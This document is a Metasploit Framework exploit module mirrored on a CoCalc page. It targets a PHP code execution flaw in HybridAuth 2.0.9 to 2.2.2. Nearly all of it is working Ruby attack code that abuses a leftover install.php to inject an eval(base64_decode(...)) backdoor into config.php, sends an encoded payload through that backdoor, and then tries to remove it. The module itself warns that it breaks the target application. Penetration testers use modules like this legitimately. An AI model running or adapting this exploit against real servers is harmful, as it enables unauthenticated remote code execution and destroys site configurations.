CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking # application config.php is overwritten

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'HybridAuth install.php PHP Code Execution',

14
      'Description'    => %q{

15
          This module exploits a PHP code execution vulnerability in

16
        HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'

17
        is not removed after installation allowing unauthenticated users to

18
        write PHP code to the application configuration file 'config.php'.

19


20
        Note: This exploit will overwrite the application configuration file

21
        rendering the application unusable.

22
      },

23
      'License'        => MSF_LICENSE,

24
      'Author'         =>

25
        [

26
          'Pichaya Morimoto', # Discovery and PoC

27
          'bcoles' # Metasploit

28
        ],

29
      'References'     =>

30
        [

31
          ['EDB', '34273'],

32
          ['OSVDB','109838']

33
        ],

34
      'Arch'           => ARCH_PHP,

35
      'Platform'       => 'php',

36
      'Targets'        =>

37
        [

38
          # Tested:

39
          # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)

40
          ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]

41
        ],

42
      'Privileged'     => false,

43
      'DisclosureDate' => '2014-08-04',

44
      'DefaultTarget'  => 0))

45


46
    register_options(

47
      [

48
        OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])

49
      ])

50
  end

51


52


53
  #

54
  # Check:

55
  # * install.php exists

56
  # * config.php is writable

57
  # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2

58
  #

59
  def check

60
    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')

61
    if !res

62
      vprint_error "Connection failed"

63
      return Exploit::CheckCode::Unknown

64
    elsif res.code == 404

65
      vprint_error "Could not find install.php"

66
    elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</

67
      vprint_error "#{$1} is not writable"

68
    elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</

69
      version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first

70
      vprint_status "Found version: #{version}"

71
      if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/

72
        return Exploit::CheckCode::Vulnerable

73
      else

74
        vprint_error "HybridAuth version #{version} is not vulnerable"

75
      end

76
    end

77
    Exploit::CheckCode::Safe

78
  end

79


80
  #

81
  # Exploit

82
  #

83
  def exploit

84
    # check vuln

85
    if check != Exploit::CheckCode::Vulnerable

86
      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"

87
    end

88


89
    # write backdoor

90
    print_status "Writing backdoor to config.php"

91
    payload_param = rand(1000)

92
    res = send_request_cgi(

93
      'method' => 'POST',

94
      'uri'    => normalize_uri(target_uri.path, 'install.php'),

95
      'data'   => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"

96
    )

97
    if !res

98
      fail_with Failure::Unknown, "#{peer} - Connection failed"

99
    elsif res.body =~ /Installation completed/

100
      print_good "Wrote backdoor successfully"

101
    else

102
      fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"

103
    end

104


105
    # execute payload

106
    code = Rex::Text.encode_base64(payload.encoded)

107
    print_status "Sending payload to config.php backdoor (#{code.length} bytes)"

108
    res = send_request_cgi({

109
      'method' => 'POST',

110
      'uri'    => normalize_uri(target_uri.path, 'config.php'),

111
      'data'   => "#{payload_param}=#{code}"

112
    }, 5)

113
    if !res

114
      print_warning "No response"

115
    elsif res.code == 404

116
      fail_with Failure::NotFound, "#{peer} - Could not find config.php"

117
    elsif res.code == 200 || res.code == 500

118
      print_good "Sent payload successfully"

119
    end

120


121
    # remove backdoor

122
    print_status "Removing backdoor from config.php"

123
    res = send_request_cgi(

124
      'method' => 'POST',

125
      'uri'    => normalize_uri(target_uri.path, 'install.php'),

126
      'data'   => 'OPENID_ADAPTER_STATUS='

127
    )

128
    if !res

129
      print_error "Connection failed"

130
    elsif res.body =~ /Installation completed/

131
      print_good "Removed backdoor successfully"

132
    else

133
      print_warning "Could not remove payload from config.php"

134
    end

135
  end

136
end

137


138